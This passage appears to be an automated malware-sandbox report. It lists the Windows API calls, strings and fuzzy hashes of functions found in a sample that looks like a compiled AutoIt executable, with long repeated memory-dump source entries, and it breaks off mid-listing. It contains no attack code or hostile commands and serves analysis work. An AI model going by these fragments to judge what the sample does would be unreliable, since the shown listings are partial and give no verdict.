                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                            • String ID: @$ThumbnailClass
                                                                                                                            • API String ID: 1788623398-1539354611
                                                                                                                            • Opcode ID: 093a49f1e1363f3b080d6f54fc995e049de3800f38a4b27b97b2bfef3ad7a424
                                                                                                                            • Instruction ID: c1674919f1cba2d620fa25357ba2bbf23d3284164b2e374cdd38d66e745e31c2
                                                                                                                            • Opcode Fuzzy Hash: 093a49f1e1363f3b080d6f54fc995e049de3800f38a4b27b97b2bfef3ad7a424
                                                                                                                            • Instruction Fuzzy Hash: 27819F71108305AFDB24DF50C8C5BAA7BE8EF44354F04846AFD95DA092DB30DE86CBA2
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wcsnicmp
                                                                                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                            • API String ID: 1038674560-1810252412
                                                                                                                            • Opcode ID: 833f9639e5280b69382726341a5fe26bed7c50d9c689681c3da662047fd24d76
                                                                                                                            • Instruction ID: 58bc55ff152e7416e6f49844a0abf58ae36b8b8b15332fd2e5ded1ea0ea231dc
                                                                                                                            • Opcode Fuzzy Hash: 833f9639e5280b69382726341a5fe26bed7c50d9c689681c3da662047fd24d76
                                                                                                                            • Instruction Fuzzy Hash: 0E314F31948209BBDB24FA51DE83FEE77A4AB11751F600629F412710D1EF526F44BE92
                                                                                                                            APIs
                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00C85013
                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00C8501E
                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00C85029
                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00C85034
                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00C8503F
                                                                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 00C8504A
                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00C85055
                                                                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00C85060
                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00C8506B
                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00C85076
                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00C85081
                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00C8508C
                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00C85097
                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00C850A2
                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00C850AD
                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00C850B8
                                                                                                                            • GetCursorInfo.USER32(?), ref: 00C850C8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Cursor$Load$Info
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2577412497-0
                                                                                                                            • Opcode ID: 0d4f1af851af7ce10f206a77b8b883df753a15724a29b89eab86581ca319132c
                                                                                                                            • Instruction ID: f6ce81bcb912f434c8cd074d4c0d078d78432c43b7034a2031eb985423f41b07
                                                                                                                            • Opcode Fuzzy Hash: 0d4f1af851af7ce10f206a77b8b883df753a15724a29b89eab86581ca319132c
                                                                                                                            • Instruction Fuzzy Hash: 7C3135B0D4831D6ADF109FB68C8999FBFE8FF04754F50452AA51CE7280DB7865008F95
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00C9A259
                                                                                                                            • DestroyWindow.USER32(?,?), ref: 00C9A2D3
                                                                                                                              • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C9A34D
                                                                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C9A36F
                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C9A382
                                                                                                                            • DestroyWindow.USER32(00000000), ref: 00C9A3A4
                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C10000,00000000), ref: 00C9A3DB
                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C9A3F4
                                                                                                                            • GetDesktopWindow.USER32 ref: 00C9A40D
                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00C9A414
                                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C9A42C
                                                                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C9A444
                                                                                                                              • Part of subcall function 00C125DB: GetWindowLongW.USER32(?,000000EB), ref: 00C125EC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                            • String ID: 0$tooltips_class32
                                                                                                                            • API String ID: 1297703922-3619404913
                                                                                                                            • Opcode ID: 09f3ff83dd59b1d48e61159c122b016c85ac5f09dd0813102e62c25b5db3630d
                                                                                                                            • Instruction ID: eb54e6acd056b769a94409930188bebc423471cbcea60941e9be9bbe000c6a98
                                                                                                                            • Opcode Fuzzy Hash: 09f3ff83dd59b1d48e61159c122b016c85ac5f09dd0813102e62c25b5db3630d
                                                                                                                            • Instruction Fuzzy Hash: 05717B71140205AFDB21CF28CC4DFAA7BE5FB89704F04452EF995872A1D7B1EA42DB92
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                                                                            • DragQueryPoint.SHELL32(?,?), ref: 00C9C627
                                                                                                                              • Part of subcall function 00C9AB37: ClientToScreen.USER32(?,?), ref: 00C9AB60
                                                                                                                              • Part of subcall function 00C9AB37: GetWindowRect.USER32(?,?), ref: 00C9ABD6
                                                                                                                              • Part of subcall function 00C9AB37: PtInRect.USER32(?,?,00C9C014), ref: 00C9ABE6
                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00C9C690
                                                                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C9C69B
                                                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C9C6BE
                                                                                                                            • _wcscat.LIBCMT ref: 00C9C6EE
                                                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C9C705
                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00C9C71E
                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00C9C735
                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00C9C757
                                                                                                                            • DragFinish.SHELL32(?), ref: 00C9C75E
                                                                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C9C851
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                            • API String ID: 169749273-3440237614
                                                                                                                            • Opcode ID: 24356444f67ff6720d97c22d51f2849141e3c7fc5fa7990cb1f7b08019ab27ec
                                                                                                                            • Instruction ID: 699d5a08f81ea68494c248777850c8ae9ceccc9e3554aaa49f8ea66c7b43674f
                                                                                                                            • Opcode Fuzzy Hash: 24356444f67ff6720d97c22d51f2849141e3c7fc5fa7990cb1f7b08019ab27ec
                                                                                                                            • Instruction Fuzzy Hash: A0616F71108305AFCB01EF64DC89EAFBBF8EF89710F10092EF595961A1DB709A49DB52
                                                                                                                            APIs
                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00C94424
                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C9446F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharMessageSendUpper
                                                                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                            • API String ID: 3974292440-4258414348
                                                                                                                            • Opcode ID: f055d8d713340eb6cef3bb2e9d843943424fdf50e0de5a87f7acbf4051ffd902
                                                                                                                            • Instruction ID: 160b4b51e247b86fa1a091898d2b9c330f98bde96dcc4a5d8b6c908409335d3b
                                                                                                                            • Opcode Fuzzy Hash: f055d8d713340eb6cef3bb2e9d843943424fdf50e0de5a87f7acbf4051ffd902
                                                                                                                            • Instruction Fuzzy Hash: FA915F712043019BCF18EF10C465AAEB7E5EF96354F15846CF8965B3A2CB31ED4AEB41
                                                                                                                            APIs
                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C9B8B4
                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00C991C2), ref: 00C9B910
                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C9B949
                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C9B98C
                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C9B9C3
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00C9B9CF
                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C9B9DF
                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?,00C991C2), ref: 00C9B9EE
                                                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C9BA0B
                                                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C9BA17
                                                                                                                              • Part of subcall function 00C32EFD: __wcsicmp_l.LIBCMT ref: 00C32F86
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                            • String ID: .dll$.exe$.icl
                                                                                                                            • API String ID: 1212759294-1154884017
                                                                                                                            • Opcode ID: 18c95d4399040acb69704bee265ec7308e6bfe24288880627c3fb76650385f65
                                                                                                                            • Instruction ID: 45fa78c4a3c0d4c07f982e9c38f2af3b21532d82a5603f6231b5c050fe45f044
                                                                                                                            • Opcode Fuzzy Hash: 18c95d4399040acb69704bee265ec7308e6bfe24288880627c3fb76650385f65
                                                                                                                            • Instruction Fuzzy Hash: 5D61FE71910218BAEF24DF64DD49FBE77B8EB08710F10411AF925D60C0DB70AE80E7A0
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                                                                              • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 00C7A3CB
                                                                                                                            • GetDriveTypeW.KERNEL32 ref: 00C7A418
                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C7A460
                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C7A497
                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C7A4C5
                                                                                                                              • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                            • API String ID: 2698844021-4113822522
                                                                                                                            • Opcode ID: 147a7a22967beac2fee7929359dba6aa82f154aba94f7058f3c64a5b16db690f
                                                                                                                            • Instruction ID: 89550b27f5aa2250e613667c4237c175f1415bf89c88e7b303cb3b00c36ff337
                                                                                                                            • Opcode Fuzzy Hash: 147a7a22967beac2fee7929359dba6aa82f154aba94f7058f3c64a5b16db690f
                                                                                                                            • Instruction Fuzzy Hash: 91513D711082059FC700EF10C8919AFB3F4EF85758F10896DF89957251DB31EE4AEB92
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00C4E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00C6F8DF
                                                                                                                            • LoadStringW.USER32(00000000,?,00C4E029,00000001), ref: 00C6F8E8
                                                                                                                              • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00CD5310,?,00000FFF,?,?,00C4E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00C6F90A
                                                                                                                            • LoadStringW.USER32(00000000,?,00C4E029,00000001), ref: 00C6F90D
                                                                                                                            • __swprintf.LIBCMT ref: 00C6F95D
                                                                                                                            • __swprintf.LIBCMT ref: 00C6F96E
                                                                                                                            • _wprintf.LIBCMT ref: 00C6FA17
                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C6FA2E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                            • API String ID: 984253442-2268648507
                                                                                                                            • Opcode ID: d47b9e3d3e555895d6261e24e53cf834199b5e9a11666d3fa8e00a6295e05418
                                                                                                                            • Instruction ID: 39451beeaed57cd9860eb90a4b698dac85f336d6459f15d7b629f64980b4ea4b
                                                                                                                            • Opcode Fuzzy Hash: d47b9e3d3e555895d6261e24e53cf834199b5e9a11666d3fa8e00a6295e05418
                                                                                                                            • Instruction Fuzzy Hash: 8D413F7280410DAACF15FBE0DD96EEE7778AF55300F100569F505B6092EB316F4AEB61
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00C99207,?,?), ref: 00C9BA56
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00C99207,?,?,00000000,?), ref: 00C9BA6D
                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00C99207,?,?,00000000,?), ref: 00C9BA78
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00C99207,?,?,00000000,?), ref: 00C9BA85
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00C9BA8E
                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00C99207,?,?,00000000,?), ref: 00C9BA9D
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00C9BAA6
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00C99207,?,?,00000000,?), ref: 00C9BAAD
                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00C99207,?,?,00000000,?), ref: 00C9BABE
                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00CA2CAC,?), ref: 00C9BAD7
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00C9BAE7
                                                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00C9BB0B
                                                                                                                            • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00C9BB36
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C9BB5E
                                                                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C9BB74
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3840717409-0
                                                                                                                            • Opcode ID: 6fd1593d142e28722ea65a9c57d9e0aedb73f70dc0ac9dc96b4f005feb20bac6
                                                                                                                            • Instruction ID: e67ed7f2c89e6b02ce4efa50c488f3368be3b0521528b6d75bc5104128c4dfa6
                                                                                                                            • Opcode Fuzzy Hash: 6fd1593d142e28722ea65a9c57d9e0aedb73f70dc0ac9dc96b4f005feb20bac6
                                                                                                                            • Instruction Fuzzy Hash: EF412675600209FFDB119F65ED8CFAEBBB8EB89711F104069F919D62A0C7709E02DB60
                                                                                                                            APIs
                                                                                                                            • __wsplitpath.LIBCMT ref: 00C7DA10
                                                                                                                            • _wcscat.LIBCMT ref: 00C7DA28
                                                                                                                            • _wcscat.LIBCMT ref: 00C7DA3A
                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C7DA4F
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C7DA63
                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00C7DA7B
                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C7DA95
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C7DAA7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                            • String ID: *.*
                                                                                                                            • API String ID: 34673085-438819550
                                                                                                                            • Opcode ID: aaa607cdd6a3717cc7426503e0ab6a965f6cbd08be4f4d7ebc7084a44048391b
                                                                                                                            • Instruction ID: 4cd3e1ce731726fc284a20d631b7b28bb43f820024042983d295488b20e9c90c
                                                                                                                            • Opcode Fuzzy Hash: aaa607cdd6a3717cc7426503e0ab6a965f6cbd08be4f4d7ebc7084a44048391b
                                                                                                                            • Instruction Fuzzy Hash: EC8171715042419FCB24EF65C844AAAB7F4FF89310F18C82EF99EC7251EA30DA85DB52
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C9C1FC
                                                                                                                            • GetFocus.USER32 ref: 00C9C20C
                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00C9C217
                                                                                                                            • _memset.LIBCMT ref: 00C9C342
                                                                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C9C36D
                                                                                                                            • GetMenuItemCount.USER32(?), ref: 00C9C38D
                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00C9C3A0
                                                                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C9C3D4
                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C9C41C
                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C9C454
